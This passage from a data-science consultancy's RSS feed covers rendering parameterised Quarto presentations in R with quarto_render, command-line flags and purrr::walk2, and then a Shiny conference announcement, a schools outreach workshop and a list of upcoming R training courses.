&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt;&lt;/span&gt;&lt;span style="color:#ff7b72"&gt;---&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="render-with-parameters"&gt;Render with parameters&lt;/h3&gt;
&lt;p&gt;To render our presentation with different parameters, we have a few
different options.&lt;/p&gt;
&lt;p&gt;If you prefer to render your presentation using an R function, you can
use &lt;code&gt;quarto::quarto_render()&lt;/code&gt; to render your presentation. You’ll just
need to provide the &lt;code&gt;input&lt;/code&gt; .qmd file, as well as a list of the
parameters with the &lt;code&gt;execute_params&lt;/code&gt; argument. So, if you wanted to
generate the presentation for Alabama in 2021 this time, your command
would look something like:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;quarto&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;quarto_render&lt;/span&gt;(input &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;slides.qmd&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; execute_params &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;list&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;year&amp;#34;&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;2021&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;state&amp;#34;&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Alabama&amp;#34;&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;img alt="Screenshot of title page of presentation that reads “UFO Sightings\nAlabama, 2021" height="auto" id="h-rh-i-1" src="https://www.jumpingrivers.com/blog/r-parameterised-presentations-quarto/presentation-title.png" width="1177"&gt;&lt;/p&gt;
&lt;p&gt;If you’d rather render your presentation from the command line, you can
also easily do so with the &lt;code&gt;quarto render&lt;/code&gt; command paired with the &lt;code&gt;-P&lt;/code&gt;
parameter flag.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;quarto render slides.qmd -P year:2021 -P state:&lt;span style="color:#a5d6ff"&gt;&amp;#34;Alabama&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;You can also supply a YAML file of key:value pairings when rendering
your presentation with parameters. Simply create a file called
&lt;code&gt;params.yml&lt;/code&gt;, and define your parameters. To change the parameters for a
new run, you can just update your YAML file.&lt;/p&gt;
&lt;p&gt;Your YAML file would look something like:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-yaml" data-lang="yaml"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# in params.yml&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt;&lt;/span&gt;&lt;span style="color:#7ee787"&gt;year&lt;/span&gt;:&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;2020&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt;&lt;/span&gt;&lt;span style="color:#7ee787"&gt;state&lt;/span&gt;:&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;Alabama&amp;#39;&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;and then, to render:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;quarto render slides.qmd --execute-params params.yml
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="rendering-multiple-parameter-combinations-at-once"&gt;Rendering multiple parameter combinations at once&lt;/h3&gt;
&lt;p&gt;Being able to render a presentation with different parameters is useful.
But let’s say you needed a single presentation for each combination of
state and year. You’d end up needing to manually render 250 separate
presentations. So, we want to automate rendering multiple combinations
of parameters at once.&lt;/p&gt;
&lt;p&gt;Instead of rendering 250 files, let’s take a sample of 3 states and 2
years, so we’ll end up with 6 presentations in total. We then create a
tibble of the year-state combinations we want to generate presentations
for:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;years &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;unique&lt;/span&gt;(ufo_sightings&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;year)[1&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;states &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;unique&lt;/span&gt;(ufo_sightings&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;state_name)[1&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;params &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; tidyr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;crossing&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; year &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; years,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; state &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; states
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;params
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;You can then either build a &lt;code&gt;for loop&lt;/code&gt; or use the
&lt;a href="https://purrr.tidyverse.org/" rel="external"&gt;{purrr}&lt;/a&gt; package to iterate over the
state-year combinations. If you want to learn more about iteration,
check out our &lt;a href="https://www.jumpingrivers.com/training/course/r-programming-functions-looping-conditionals/" rel="external"&gt;Programming with
R&lt;/a&gt;
and our &lt;a href="https://www.jumpingrivers.com/training/course/r-tidyverse-programming-purrr-lists/" rel="external"&gt;Functional Programming with
purrr&lt;/a&gt;
courses.&lt;/p&gt;
&lt;p&gt;Here, we’re using the &lt;code&gt;walk2()&lt;/code&gt; function from &lt;code&gt;{purrr}&lt;/code&gt; to iterate over
the different year-state combinations to create multiple files. The
&lt;code&gt;walk2()&lt;/code&gt; function lets you iterate over two inputs simultaneously and
is used when your function has a &lt;em&gt;side effect&lt;/em&gt;, such as writing a file,
rather than wanting the output returned as an R object.&lt;/p&gt;
&lt;p&gt;We also include our input parameters in the output file name to allow us
to distinguish between the multiple output files:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;purrr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;walk2&lt;/span&gt;(params&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;year, params&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;state, &lt;span style="color:#ff7b72;font-weight:bold"&gt;~&lt;/span&gt;quarto&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;quarto_render&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; input &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;slides.qmd&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; execute_params &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;list&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;year&amp;#34;&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; .x,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;state&amp;#34;&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; .y),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; output_file &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; glue&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;glue&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;{.y}_{.x}.html&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Running this command, you end up with 6 aptly named output files:&lt;/p&gt;
&lt;p&gt;&lt;img alt="Screenshot of file list showing the files Michigan_2021.html,\nMichigan_2022.html, North Carolina_2021.html, North Caroline_2022.html,\nOhio_2021.html, Ohio_2022.html" height="auto" id="h-rh-i-2" src="https://www.jumpingrivers.com/blog/r-parameterised-presentations-quarto/multiple-parameters.png" width="752"&gt;&lt;/p&gt;
&lt;p&gt;And there you have it! Generating multiple presentations or reports at
once is a fairly straightforward process when using Quarto to render
your outputs. You can of course extend this logic and create much more
in-depth reports or presentations with different kinds of outputs,
including text summaries, which depend on input parameters.&lt;/p&gt;
&lt;p&gt;To see the full code behind this blog post, as well as some further
examples in a more fleshed out Quarto report, check out the &lt;a href="https://github.com/jumpingrivers/blog/tree/main/blogs/2023-r-parameterised-presentations-quarto" rel="external"&gt;blogs repo
on our
GitHub&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/r-parameterised-presentations-quarto/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Shiny in Production 2023</title><link>https://www.jumpingrivers.com/blog/shiny-in-production-2023-conference-r-workshops/</link><pubDate>Tue, 18 Jul 2023 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/shiny-in-production-2023-conference-r-workshops/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/shiny-in-production-2023-conference-r-workshops/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/shiny-in-production-2023-conference-r-workshops/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;With the early bird deadline approaching, we thought now would be a great time to tell you a bit more about what to expect at this year&amp;rsquo;s &lt;a href="https://shiny-in-production.jumpingrivers.com/" rel="external"&gt;Shiny in Production&lt;/a&gt;!&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you require help building a Shiny app? Would you like someone to take over the maintenance burden?
If so, check out
our
&lt;a href="https://www.jumpingrivers.com/consultancy/shiny-dash-flask-dashboard-consultancy/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2023-shiny-in-production-2023-conference-r-workshops"&gt;Shiny and Dash&lt;/a&gt;
services.
&lt;/p&gt;
&lt;/aside&gt;
&lt;p&gt;As with last year&amp;rsquo;s conference, SIP2023 will take place over a day and a half at the &lt;a href="https://www.thecatalystnewcastle.co.uk/" rel="external"&gt;Catalyst&lt;/a&gt; in Newcastle upon Tyne, UK. The first day (Thursday 12th October), will consist of three parallel workshops, followed by a drinks reception in the evening, a great opportunity for networking and debriefing from the day&amp;rsquo;s learning.&lt;/p&gt;
&lt;p&gt;The second day (Friday 13th October) will be full of talks from speakers across industry, telling us all about all things Shiny and other web based R tools. If you want more of an idea of what to expect, check out the &lt;a href="https://youtube.com/playlist?list=PLbARZQfpqIKJ6Un06aThcKJC7eQMSgKRD" rel="external"&gt;playlist of talks&lt;/a&gt; from last year&amp;rsquo;s conference.&lt;/p&gt;
&lt;p&gt;So far this year we have announced 3 of our invited speakers, and we are currently reviewing the submissions from the recent call for abstracts. The line up so far is:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.linkedin.com/in/anna-skrzydlo/" rel="external"&gt;Anna Skrzydło&lt;/a&gt; (&lt;a href="https://appsilon.com/" rel="external"&gt;Appsilon&lt;/a&gt;) - &lt;em&gt;3 reasons why nobody uses your app&lt;/em&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.linkedin.com/in/george-w-stagg/" rel="external"&gt;George Stagg&lt;/a&gt; (&lt;a href="https://posit.co/" rel="external"&gt;Posit&lt;/a&gt;) - &lt;em&gt;Title TBC&lt;/em&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.linkedin.com/in/cararthompson/" rel="external"&gt;Cara Thompson&lt;/a&gt; (&lt;a href="https://www.cararthompson.com/" rel="external"&gt;Freelance data consultant&lt;/a&gt;) - &lt;em&gt;Dynamic annotations: tips and tricks to make text shine without stealing the show&lt;/em&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/shiny-in-production-2023-conference-r-workshops/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Changing the world with Data: An outreach event</title><link>https://www.jumpingrivers.com/blog/speakers-for-schools-data-science-outreach-event-r-shiny-data-visualisation/</link><pubDate>Thu, 06 Jul 2023 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/speakers-for-schools-data-science-outreach-event-r-shiny-data-visualisation/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/speakers-for-schools-data-science-outreach-event-r-shiny-data-visualisation/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/speakers-for-schools-data-science-outreach-event-r-shiny-data-visualisation/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Earlier this year, two data scientists from Jumping Rivers ran an outreach activity for 14-19 year olds across the UK, in collaboration with the youth charity &lt;a href="https://www.speakersforschools.org/" rel="external"&gt;Speakers for Schools&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;The three hour workshop focussed on how to create visualisations that are both visually appealing and useful to the viewer. We demonstrated with a few examples of some visualisations that we created from some questions we asked on sign up (their favourite fast food restaurants and snacks) and showed them some examples of visualisations that challenged the view of data visualisation all being bar charts and scatter plots - think football pundit analysis and tube maps!&lt;/p&gt;
&lt;img src="taste-change.png" alt="Bar chart of sweet vs savoury snacks" style="width: 600px; display: block; margin-left: auto; margin-right: auto"/&gt;
&lt;p&gt;The session culminated with us turning the tables - we became the clients, specifically, two biologists, recently returned from their studies of some penguin species in Antarctica! We asked them to design a dashboard to help us explore all of the data we had collected.&lt;/p&gt;
&lt;p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Whether you want to start from scratch, or improve your skills, &lt;a href="https://www.jumpingrivers.com/training/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2023-speakers-for-schools-data-science-outreach-event"&gt;Jumping Rivers has a training course for you&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;!-- This is where the ad goes! Just use the name of the shortcode file. --&gt;&lt;/p&gt;
&lt;p&gt;Those of you familiar with the R programming language will probably recognise the reasoning for this particular leap in professions. The {&lt;a href="https://allisonhorst.github.io/palmerpenguins/" rel="external"&gt;palmerpenguins&lt;/a&gt;} package, originally published in 2020 by Allison Marie Horst and Alison Presmanes Hill and Kristen B. Gorman is an excellent resource for teaching data exploration and visualisation! And it even comes with some adorable artwork that you can download to help.&lt;/p&gt;
&lt;figure&gt;
&lt;img src="penguins.png" alt="Cartoon of three types of penguin, Chinstrap, Gentoo and Adelie" style="width: 600px; display: block; margin-left: auto; margin-right: auto"/&gt;
&lt;figcaption&gt;Artwork by @allison_horst&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;p&gt;We developed a Shiny app that could be accessed by attendees via their browsers, which allowed them to create their own visualisations of the penguin data. With options to change the size, shape and colour of the points based on the data, the ability to play around with the axes, colour palettes and themes, as well as to add customised labels and choose to split by year, or add a line of fit, there was a lot to keep you busy!&lt;/p&gt;
&lt;p&gt;We wanted to make sure we had enough options in to make it fully customisable, while also giving attendees the opportunity to make something truly awful, if they wanted, to demonstrate some dos and don&amp;rsquo;ts of data visualisation.&lt;/p&gt;
&lt;img src="penguin-app.png" alt="Screenshot of Shiny App that gives plotting options for the penguins data to build a visualisation." style="width: 800px; display: block; margin-left: auto; margin-right: auto"/&gt;
&lt;p&gt;While we can&amp;rsquo;t share the creations here, we were very impressed with the creativeness that we saw throughout the whole workshop. The collaborative whiteboards were well used for introductions via the medium of sketched visualisations!&lt;/p&gt;
&lt;p&gt;We hope that the attendees of this workshop enjoyed themselves as much as we did! If you&amp;rsquo;re interested in learning how to make great visualisations, or how to create Shiny apps, take a look at our &lt;a href="https://www.jumpingrivers.com/training/all-courses/" rel="external"&gt;course page&lt;/a&gt;. We offer courses on visualisation in &lt;a href="https://www.jumpingrivers.com/training/course/r-advanced-graphics-ggplot2-plotly-themes-scaling-faceting/" rel="external"&gt;R&lt;/a&gt; and &lt;a href="https://www.jumpingrivers.com/training/course/python-matplotlib-seaborn-visualisation/" rel="external"&gt;Python&lt;/a&gt;, as well as a variety of courses on Shiny, from an &lt;a href="https://www.jumpingrivers.com/training/course/r-introduction-shiny-application-web/" rel="external"&gt;introduction for Shiny beginners&lt;/a&gt;, to more &lt;a href="https://www.jumpingrivers.com/training/course/advanced-shiny/" rel="external"&gt;advanced concepts&lt;/a&gt; and &lt;a href="https://www.jumpingrivers.com/training/course/web-accessibility-in-shiny/" rel="external"&gt;web accessibility&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/speakers-for-schools-data-science-outreach-event-r-shiny-data-visualisation/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>July Training Update</title><link>https://www.jumpingrivers.com/blog/july-training-update-python-r-quarto-git-sql/</link><pubDate>Tue, 04 Jul 2023 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/july-training-update-python-r-quarto-git-sql/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/july-training-update-python-r-quarto-git-sql/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/july-training-update-python-r-quarto-git-sql/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Embark on your programming odyssey with our extensive range of courses! Never written a line of code in your life? No stress - we offer a mix of introductory courses for beginners as well as more advanced courses for those looking to expand their knowledge further.&lt;/p&gt;
&lt;p&gt;Over the summer and autumn months, we will be offering training in the popular programming languages Python and R, plus additional courses on Quarto, Git and SQL.&lt;/p&gt;
&lt;p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Whether you want to start from scratch, or improve your skills, &lt;a href="https://www.jumpingrivers.com/training/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2023-july-training-update"&gt;Jumping Rivers has a training course for you&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;!-- This is where the ad goes! Just use the name of the shortcode file. --&gt;&lt;/p&gt;
&lt;h3 id="r"&gt;R&lt;/h3&gt;
&lt;p&gt;We have something for everyone with our R courses, whether it&amp;rsquo;s statistical modelling and machine learning you&amp;rsquo;re after, or data visualisation with {ggplot2} and {shiny}.&lt;/p&gt;
&lt;h4 id="statistical-modelling-with-r"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/r-statistics-modelling-linear-regression-clustering/" rel="external"&gt;Statistical Modelling with R&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course Level: Intermediate&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Next course date: 17th July 2023 &lt;strong&gt;(DEADLINE 10th July)&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;From the very beginning, R was designed for statistical modelling. Out of the box, R makes standard statistical techniques easy. &lt;a href="https://www.jumpingrivers.com/training/course/r-statistics-modelling-linear-regression-clustering/" rel="external"&gt;This course&lt;/a&gt; covers the fundamental modelling techniques. We begin the day by revising hypotheses tests, before moving onto ANOVA tables and regression analysis. The class ends by looking at more sophisticated methods such as clustering and principal components analysis (PCA).&lt;/p&gt;
&lt;h4 id="data-visualisation-with-ggplot2"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/r-advanced-graphics-ggplot2-plotly-themes-scaling-faceting/" rel="external"&gt;Data Visualisation with ggplot2&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course Level: Intermediate&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Next course date: 4th September 2023&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Want to learn how to effectively visualise your data in R using the elegant {ggplot2} package? With {ggplot2} it’s easy to customise everything from plot layouts and themes to scales, colours, and more! &lt;a href="https://www.jumpingrivers.com/training/course/r-advanced-graphics-ggplot2-plotly-themes-scaling-faceting/" rel="external"&gt;This course&lt;/a&gt; will comprehensively take you through basic plot types such as bar and line charts as well as cover more advanced topics such as interactive graphics with {plotly}.&lt;/p&gt;
&lt;h4 id="spatial-data-analysis-with-r"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/r-spatial-analysis-sf-tmap-leaflet/" rel="external"&gt;Spatial Data Analysis with R&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course Level: Intermediate&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Next course date: 18th September 2023&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;As spatial data sets get larger, more sophisticated software needs to be harnessed for their analysis. R is now a widely used open source software platform for working with spatial data thanks to its powerful analysis and visualisation packages. The focus of &lt;a href="https://www.jumpingrivers.com/training/course/r-spatial-analysis-sf-tmap-leaflet/" rel="external"&gt;this course&lt;/a&gt; is providing participants with the understanding needed to apply R’s powerful suite of geographical tools to their own problems.&lt;/p&gt;
&lt;h4 id="introduction-to-shiny"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/r-introduction-shiny-application-web/" rel="external"&gt;Introduction to Shiny&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course Level: Intermediate&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Next course date: 2nd October 2023&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Do you want to provide interactive visualisation and data exploration features for users who do not have R and data science skills? &lt;a href="https://www.jumpingrivers.com/training/course/r-introduction-shiny-application-web/" rel="external"&gt;Discover how easy it can be&lt;/a&gt; to use R and {shiny} to create your own apps and dashboards for exploring data without relying on web development or external BI tools. We will show you various examples of input widgets and outputs to display tables and visualisations.&lt;/p&gt;
&lt;h4 id="time-series-analysis-with-r"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/r-time-series-prediction-arima/" rel="external"&gt;Time Series Analysis with R&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course Level: Intermediate&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Next course date: 30th October 2023&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Predicting the future is a tough problem. Time series analysis makes it possible to assess whether or not predictions are possible and, if they are, build a model which can generate informed predictions for the future with realistic estimates of uncertainty. &lt;a href="https://www.jumpingrivers.com/training/course/r-time-series-prediction-arima/" rel="external"&gt;This training course&lt;/a&gt; will introduce participants to the packages in the &lt;a href="https://tidyverts.org/" rel="external"&gt;Tidyverts&lt;/a&gt;.&lt;/p&gt;
&lt;h4 id="building-an-r-package"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/r-package-documentation-roxygen2/" rel="external"&gt;Building an R Package&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course Level: Advanced&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Next course date: 1st November 2023&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;This is a &lt;a href="https://www.jumpingrivers.com/training/course/r-package-documentation-roxygen2/" rel="external"&gt;one-day intensive course&lt;/a&gt; on building a package in R. The focus will be on getting a working R package ready for distribution. This includes automating package setup and consistent package structure with {usethis}. You will be able to use the {testthat} workflow to create tests for packages.&lt;/p&gt;
&lt;h4 id="machine-learning-with-tidymodels"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/r-prediction-inference-analytics-machine-learning-tidymodels/" rel="external"&gt;Machine Learning with Tidymodels&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course Level: Intermediate&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Next course date: 6th November 2023&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Machine learning is the process of applying statistical techniques to gain systematic information about a quantity of interest. &lt;a href="https://www.jumpingrivers.com/training/course/r-prediction-inference-analytics-machine-learning-tidymodels/" rel="external"&gt;We will be specifically focusing&lt;/a&gt; on how we can use the {tidymodels} suite of packages to implement these techniques. We cover key reasons for model fitting, such as prediction and inference, on quantitative and qualitative responses.&lt;/p&gt;
&lt;h4 id="advanced-machine-learning-with-tidymodels"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/r-prediction-inference-tidymodels-lda-pre-processing-tree-based-models/" rel="external"&gt;Advanced Machine Learning with Tidymodels&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course Level: Advanced&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Next course date: 8th November 2023&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;A course that builds on the material covered in our &lt;a href="https://www.jumpingrivers.com/training/course/r-prediction-inference-analytics-machine-learning-tidymodels" rel="external"&gt;Machine Learning with Tidymodels&lt;/a&gt; course. We take a look at how we can fit linear discriminant analysis (LDA) models using {discrim}, assessing model reliability using V-fold cross validation, pre-processing, tree-based models &amp;amp; more. If you wish to explore the abundance of model fitting techniques {tidymodels} has to offer, then &lt;a href="https://www.jumpingrivers.com/training/course/r-prediction-inference-tidymodels-lda-pre-processing-tree-based-models/" rel="external"&gt;this course&lt;/a&gt; is certainly for you!&lt;/p&gt;
&lt;h3 id="python"&gt;Python&lt;/h3&gt;
&lt;p&gt;With our Python courses, you will start from programming basics and work your way up to data visualisation and machine learning.&lt;/p&gt;
